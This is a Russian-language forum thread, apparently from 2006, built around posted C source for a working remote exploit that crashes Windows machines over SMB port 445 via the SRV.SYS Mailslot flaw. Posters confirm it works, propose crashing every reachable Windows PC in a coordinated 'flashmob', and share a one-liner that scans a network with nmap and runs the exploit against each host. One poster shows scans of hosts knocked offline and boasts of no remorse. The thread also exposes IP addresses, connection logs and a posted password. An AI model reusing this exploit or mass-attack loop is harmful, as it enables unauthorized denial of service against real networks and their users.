наткнулся случайно на свежую уязвимость в Виндах..

> так что если кому лень самому переписывать - обращайтесь.

Выкладывай давай :)

//данный код распространяется по лицензии GPL, только для
//тестирования на безопасность.
#include <stdio.h>
#include <sys/socket.h>
#include <string.h>
#include <sys/types.h>
#include <netinet/in.h>

unsigned char SmbNeg[] =
"\x00\x00\x00\x2f\xff\x53\x4d\x42\x72\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x88\x05\x00\x00\x00\x00\x00\x0c\x00\x02\x4e\x54"
"\x20\x4c\x4d\x20\x30\x2e\x31\x32\x00";

unsigned char Session_Setup_AndX_Request[]=
"\x00\x00\x00\x48\xff\x53\x4d\x42\x73\x00"
"\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\xff\xff\x88\x05\x00\x00\x00\x00\x0d\xff\x00\x00\x00\xff"
"\xff\x02\x00\x88\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x01\x00\x00\x00\x0b\x00\x00\x00\x6e\x74\x00\x70\x79\x73\x6d"
"\x62\x00";

unsigned char TreeConnect_AndX_Request[]=
"\x00\x00\x00\x58\xff\x53\x4d\x42\x75\x00"
"\x00\x00\x00\x18\x07\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\xff\xfe\x00\x08\x00\x03\x04\xff\x00\x58\x00\x08"
"\x00\x01\x00\x2d\x00\x00\x5c\x00\x5c\x00\x31\x00\x37\x00\x32\x00"
"\x2e\x00\x32\x00\x32\x00\x2e\x00\x35\x00\x2e\x00\x34\x00\x36\x00"
"\x5c\x00\x49\x00\x50\x00\x43\x00\x24\x00\x00\x00\x3f\x3f\x3f\x3f"
"\x3f\x00";

unsigned char Trans_Request[]=
"\x00\x00\x00\x56\xff\x53\x4d\x42\x25\x00"
"\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x08\x88\x05\x00\x08\x00\x00\x11\x00\x00\x01\x00\x00"
"\x04\xe0\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x55"
"\x00\x01\x00\x55\x00\x03\x00\x01\x00\x00\x00\x00\x00\x11\x00\x5c"
"\x4d\x41\x49\x4c\x53\x4c\x4f\x54\x5c\x4c\x41\x4e\x4d\x41\x4e\x41";


unsigned char recvbuff[2048];

void neg ( int s ){
char response[1024];
memset(response,0,sizeof(response));
send(s,(char *)SmbNeg,sizeof(SmbNeg)-1,0);
}

int main(int argc,char **argv){
if(!argv[1]){
printf("\nplease enter target Ip address\n\n");
return;
}
struct sockaddr_in server;
int sock;
int ret;
int userid,treeid;

sock = socket(AF_INET,SOCK_STREAM,0);
if(sock<=0){
return -1;
}
server.sin_family = AF_INET;
server.sin_addr.s_addr = inet_addr(argv[1]);
server.sin_port = htons(445);

ret=connect(sock,(struct sockaddr *)&server,sizeof(server));
if (ret==-1){
printf("connect error!\n");
return;
}
neg(sock);
recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
ret=send(sock,(char *)Session_Setup_AndX_Request,sizeof(Session_Setup_AndX_Request)-1,0);
if (ret<=0){
printf("send Session_Setup_AndX_Request error!\n");
return;
}
recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
userid=*(int*)(recvbuff+0x20); //get userid
memcpy(TreeConnect_AndX_Request+0x20,(char *)&userid,2); //update userid
ret=send(sock,(char *)TreeConnect_AndX_Request,sizeof(TreeConnect_AndX_Request)-1,0);
if (ret<=0){
printf("send TreeConnect_AndX_Request error!\n");
return;
}
recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
treeid=*(int *)(recvbuff+0x1c); //get treeid

memcpy(Trans_Request+0x20,(char *)&userid,2); //update userid
memcpy(Trans_Request+0x1c,(char *)&treeid,2); //update treeid

ret=send(sock,(char *)Trans_Request,sizeof(Trans_Request)-1,0);
if (ret<=0){
printf("send Trans_Request error!\n");
return;
}
recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
close(sock);
return 0;
}

Работает!

Вот вам уязвимость в венде: делаешь Scan Disk на USB External Hard Drive. Посреди процесса выдергиваешь диск. Венда ускоренно пройдет оставшиеся минуты теста и скажет "Disk is okay" Вот так она может прочитать мысли диска...

точно работает :D

>скажет "Disk is okay" Вот так она может прочитать мысли диска...

Как всегда - криво.

кстати, о кривости Венды -
потестировав сабж, решили попробовать обновить тачку с виндой, скачать паки всякие с microsoft.com. На тачке стоит обычная XP_SP2, есть ключ... вобщем стали активировать, а она говорит, что типа ключ -
неверный )), 2 ключа попробовали - не получается...хотя ключи ест-но правильные (покупные) - вот вам и клюик винды.

мдям, тихо и незаметно кого-то уронил... :)

/me с ужасом думает, что будет, если в наших сетях запустить что-от вроде -
for i in `cat ip_list`;do exploit $i;done

пол-города умрет.

ну теперь венде точно песец )))

Может даже больше чем полгорода...
Ждем в ближайшее время кучу сообщений на всяких форумах типа "Помагите! Винда глючит!!!1"
Интересно, а если на винде остановить службу Server и заткнуть фаером 445-й порт это спасет?

Пора DDoS-ить батарейкина, а то толксы опять слоем чуши покроются :)

>Интересно, а если на винде остановить службу Server и заткнуть
>фаером 445-й порт это спасет?

да. проверено. собсно тогда просто не удасться забиндиться на порт..
и еще раз напоминаю - уязвимость конкретно в драйвере SRV.SYS службы Server при обработке Mailslot сообшений. Та еще есть потенциальная возможность выполнения произвольного кода...но я пока не копался..

я тут подумал :)) - а это хороший повод для линукса, очень удачно можно подвести под это дело тезис о том, что Винда очень небезопасная
система(это так и есть, но одно дело слова, а другое - BSoD перед глазами начальства), а Linux - очень секьюрная и стабильная ось..

Вобщем, предлагаю всем анонимусам, поставить сабж в крон и через некоторое время о Венде никто и не вспомнит )), если конечно микрософт оперативно не закроет дыру..

>Вобщем, предлагаю всем анонимусам, поставить сабж в крон и через некоторое время о Венде никто и не вспомнит ))

Ну вспомни эпидемию msblast... никто про винду не забыл, скорее наоборот юзеры в процессе излечения/переустановки системы еще больше к ней привязались =) такой вот психологический эффект =)

Хорошее средство для расчистки диалапных пулов у провайдена.

>я тут подумал :)) - а это хороший повод для линукса, очень удачно можно подвести под это дело тезис о том, что Винда очень небезопасная
система(это так и есть, но одно дело слова, а другое - BSoD перед глазами начальства), а Linux - очень секьюрная и стабильная ось..

Нам тогда Debian припомнят и 2 локальных root'а :)

локальный рут - это намного менее страшная брешь, да и к тому же ии сразу же закрыли.

А может флешмоб? Скажем, завтра в 20:00 по Москве кладем все виндовые компы, до которых можем дотянуться по сети, в Синий Экран (или что там с ними происходит).

там появляется BSOD или ребут, на выбор.

чур я учавствовать не буду, ибо меня уволят сразу :))
кстати, есть предположение, что в журналах событий у винды не отображается IP атакующего и даже сама попытка коннекта, т.к. просто не успевает :))

А что за такое не сажают?

поддерживаю, веселуха =)

>Вот вам уязвимость в венде: делаешь Scan Disk на USB External Hard Drive. 
>Посреди процесса выдергиваешь диск. Венда ускоренно пройдет оставшиеся 
>минуты теста и скажет "Disk is okay" Вот так она может прочитать мысли диска...

А уязвимость, как эксплуатировать можно, кроме, как виндузятников удивлять?

ЗЫ
А Мелкософт, что на это говорит?

Поэкспериментировал с XP в vmware.

Для работы эксплойта требуется активная "служба доступа к файлам и принтерам" и фаервол отключенный или разрешающий "удаленный доступ к файлам и принтерам".

Умирает мгновенно, сразу в синий экран уходит, вот только эксплойт подвешивается, нужно по Ctrl-C отрубать, так что в цикле сетку повесить не получится :-)

>Интересно, а если на винде остановить службу Server и заткнуть фаером 445-й порт это спасет?

$ cat /etc/services | grep  445
microsoft-ds    445/tcp                         # Microsoft Naked CIFS
microsoft-ds    445/udp

Прикольно!
Это их ДС! 

Ты, где диалап нпшел?

А всё-таки... Почему, если в винде уязвимость, то сразу удалённая?

Кстати, эти упыри все знали =) Звучит красиво:

Microsoft Naked CIFS

HINT: naked!!!

Ща, народ проверяет, у меня винды нет, может и удаленная =(

Ты вроде бы ко мне в профиль заглядывал, а такие вопросы задаёшь...

ppp0 Link encap:Point-to-Point Protocol
inet addr:213.135.131.59 P-t-P:213.135.128.74 Mask:255.255.255.255
UP POINTOPOINT RUNNING NOARP MULTICAST MTU:1500 Metric:1

Я не модератор и ИПЕЙ не вижу(

И это к лучшему

PS: заодно и это посмотри :) whois 213.135.128.74

Так у меня в профиле город вписан :)

может ты стразу рутовый пароль сюда выложешь ?

Ой!.. Сорри...

А оно упало...

А сама программулина у меня не завершается, но жертвы падають.

Тем более, что это фигня =)

$ssh 10.1.1.9
...
$ su
Password:
# zcat /var/log/messages.1.gz | grep -i pppd
Aug  1 12:05:21 p200mmx pppd[19613]: LCP terminated by peer
Aug  1 12:05:21 p200mmx pppd[19613]: Couldn't increase MTU to 1500
Aug  1 12:05:21 p200mmx pppd[19613]: Couldn't increase MRU to 1500
Aug  1 12:05:24 p200mmx pppd[19613]: Connection terminated.
Aug  1 12:05:24 p200mmx pppd[19613]: Connect time 713.7 minutes.
Aug  1 12:05:24 p200mmx pppd[19613]: Sent 2118229 bytes, received 10918263 bytes.
Aug  1 12:05:45 p200mmx pppd[19613]: PPP session is 2888
Aug  1 12:05:45 p200mmx pppd[19613]: Using interface ppp0
Aug  1 12:05:45 p200mmx pppd[19613]: Connect: ppp0 <--> nas0
Aug  1 12:05:45 p200mmx pppd[19613]: Couldn't increase MTU to 1500
Aug  1 12:05:45 p200mmx pppd[19613]: Couldn't increase MRU to 1500
Aug  1 12:05:45 p200mmx pppd[19613]: Couldn't increase MRU to 1500
Aug  1 12:05:46 p200mmx pppd[19613]: PAP authentication succeeded
Aug  1 12:05:46 p200mmx pppd[19613]: peer from calling number 00:90:1A:41:FB:7A authorized
Aug  1 12:05:46 p200mmx pppd[19613]: local  IP address 89.110.9.172
Aug  1 12:05:46 p200mmx pppd[19613]: remote IP address 89.110.8.1
Aug  1 12:16:17 p200mmx pppd[19613]: LCP terminated by peer
Aug  1 12:16:17 p200mmx pppd[19613]: Couldn't increase MTU to 1500
Aug  1 12:16:17 p200mmx pppd[19613]: Couldn't increase MRU to 1500
Aug  1 12:16:20 p200mmx pppd[19613]: Connection terminated.
Aug  1 12:16:20 p200mmx pppd[19613]: Connect time 10.6 minutes.
Aug  1 12:16:20 p200mmx pppd[19613]: Sent 4613 bytes, received 5168 bytes.
Aug  1 12:16:25 p200mmx pppd[19613]: PPP session is 2920
Aug  1 12:16:25 p200mmx pppd[19613]: Using interface ppp0
Aug  1 12:16:25 p200mmx pppd[19613]: Connect: ppp0 <--> nas0
Aug  1 12:16:25 p200mmx pppd[19613]: Couldn't increase MTU to 1500
Aug  1 12:16:25 p200mmx pppd[19613]: Couldn't increase MRU to 1500
Aug  1 12:16:25 p200mmx pppd[19613]: Couldn't increase MRU to 1500
Aug  1 12:16:25 p200mmx pppd[19613]: PAP authentication succeeded
Aug  1 12:16:25 p200mmx pppd[19613]: peer from calling number 00:90:1A:41:FB:7A authorized
Aug  1 12:16:25 p200mmx pppd[19613]: local  IP address 89.110.11.4
Aug  1 12:16:25 p200mmx pppd[19613]: remote IP address 89.110.8.1
Aug  1 12:21:56 p200mmx pppd[19613]: LCP terminated by peer
Aug  1 12:21:56 p200mmx pppd[19613]: Couldn't increase MTU to 1500
Aug  1 12:21:56 p200mmx pppd[19613]: Couldn't increase MRU to 1500
Aug  1 12:21:59 p200mmx pppd[19613]: Connection terminated.
Aug  1 12:21:59 p200mmx pppd[19613]: Connect time 5.6 minutes.
Aug  1 12:21:59 p200mmx pppd[19613]: Sent 6402 bytes, received 4184 bytes.
Aug  1 12:22:04 p200mmx pppd[19613]: PPP session is 2937
Aug  1 12:22:04 p200mmx pppd[19613]: Using interface ppp0
Aug  1 12:22:04 p200mmx pppd[19613]: Connect: ppp0 <--> nas0
Aug  1 12:22:04 p200mmx pppd[19613]: Couldn't increase MTU to 1500
Aug  1 12:22:04 p200mmx pppd[19613]: Couldn't increase MRU to 1500
Aug  1 12:22:05 p200mmx pppd[19613]: Couldn't increase MRU to 1500
Aug  1 12:22:05 p200mmx pppd[19613]: PAP authentication succeeded
Aug  1 12:22:05 p200mmx pppd[19613]: peer from calling number 00:90:1A:41:FB:7A authorized
Aug  1 12:22:05 p200mmx pppd[19613]: local  IP address 89.110.11.155
Aug  1 12:22:05 p200mmx pppd[19613]: remote IP address 89.110.8.1
Aug  2 00:22:09 p200mmx pppd[19613]: LCP terminated by peer
Aug  2 00:22:09 p200mmx pppd[19613]: Couldn't increase MTU to 1500
Aug  2 00:22:09 p200mmx pppd[19613]: Couldn't increase MRU to 1500
Aug  2 00:22:12 p200mmx pppd[19613]: Connection terminated.
Aug  2 00:22:12 p200mmx pppd[19613]: Connect time 720.1 minutes.
Aug  2 00:22:12 p200mmx pppd[19613]: Sent 12500070 bytes, received 9074343 bytes.
Aug  2 00:22:17 p200mmx pppd[19613]: PPP session is 4924
Aug  2 00:22:17 p200mmx pppd[19613]: Using interface ppp0
Aug  2 00:22:17 p200mmx pppd[19613]: Connect: ppp0 <--> nas0
Aug  2 00:22:17 p200mmx pppd[19613]: Couldn't increase MTU to 1500
Aug  2 00:22:17 p200mmx pppd[19613]: Couldn't increase MRU to 1500
Aug  2 00:22:17 p200mmx pppd[19613]: Couldn't increase MRU to 1500
Aug  2 00:22:17 p200mmx pppd[19613]: PAP authentication succeeded
Aug  2 00:22:17 p200mmx pppd[19613]: peer from calling number 00:90:1A:41:FB:7A authorized
Aug  2 00:22:17 p200mmx pppd[19613]: local  IP address 89.110.11.84
Aug  2 00:22:17 p200mmx pppd[19613]: remote IP address 89.110.8.1

А это АДСЛ

На, бери, не жалко...

$sudo cat /etc/shadow | grep root
root:*:13255:0:::::

ну и где жу тут пароль ? :))
а показать звездочки все могут .

Ты спросил, где я нашёл диалап, я тебе ответил. :)

Не бывает на моей машине рутового пароля, всем до завтра. :)

89.110.8.6
ghfhryti
Сломай!
Это, как раз на том ИП, который ты видишь!
12 часов будет висеть, потом сменю, точнее ИП сменят, еще точнее все сменим

Для доказательства: lcat restore Из хомы сюда

а чего там ломать )), пусть ломают красноглазые анонимусы.

Win 2000sp4 работает на ура.

А через аську, если как вложение, кладёт только так.

всмысле ?

Блэкдаун в локалке

for i in `nmap -sP 192.168.0.0/16 | cut -f 2 -d "(" | cut -f 1 -d ")"`; do ( (./winfuck $i)& sleep 2; kill ${!}; )& sleep 0.1; done;

Вещь. Ща испытаю.

Хехе

[elf@elf (~)]$ cat ips5

Starting Nmap 4.01 ( http://www.insecure.org/nmap/ ) at 2006-08-02 20:44 EEST
Host 192.168.50.4 appears to be up.
Host 192.168.50.6 appears to be up.
Host 192.168.50.9 appears to be up.
Host 192.168.50.10 appears to be up.
Host 192.168.50.11 appears to be up.
Host 192.168.50.15 appears to be up.
Nmap finished: 256 IP addresses (6 hosts up) scanned in 8.945 seconds
[elf@elf (~)]$ cat ips52

Starting Nmap 4.01 ( http://www.insecure.org/nmap/ ) at 2006-08-02 20:45 EEST
Host 192.168.50.1 appears to be up.
Host 192.168.50.11 appears to be up.
Host 192.168.50.15 appears to be up.
Nmap finished: 256 IP addresses (3 hosts up) scanned in 2.262 seconds


первый файл - до, второй - после :)

И вот почему-то никаких угрызений совести...